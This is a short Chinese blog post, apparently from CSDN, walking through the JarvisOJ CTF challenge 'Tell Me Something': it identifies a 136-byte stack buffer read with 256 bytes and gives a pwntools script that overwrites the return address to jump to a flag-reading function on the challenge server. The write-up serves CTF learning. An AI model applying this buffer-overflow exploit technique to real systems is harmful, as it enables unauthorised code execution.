jarvisoj——Tell Me Something

本来想做其他的平台,但是搜了一下还是这个平台比较适合入门。

题目

在这里插入图片描述

Wp

这里首先下载,然后ida打开,看到main函数

在这里插入图片描述

main函数说的实际上就是有一个保存的栈大小为136,但是确允许输入256栈大小的内容,这里存在栈溢出的问题。

然后这里可以看到有一个good_gaem
在这里插入图片描述

可以看到是读取了一个flag.txt的文件。
在这里插入图片描述

那么需要做的就是先覆盖,这里我自己感觉的是,覆盖先将自身拉满,然后加返回地址直接覆盖就行。

最后就是先覆盖136的自身,然后加上good_game的地址即可。

pwntools

from pwn import *
sh = remote("pwn.jarvisoj.com",9876)  
data=136*'a'+p64(0x400620)
sh.sendline(data)
sh.interactive()
sh.close()  

在这里插入图片描述

相关推荐
©️2020 CSDN 皮肤主题: 程序猿惹谁了 设计师:白松林 返回首页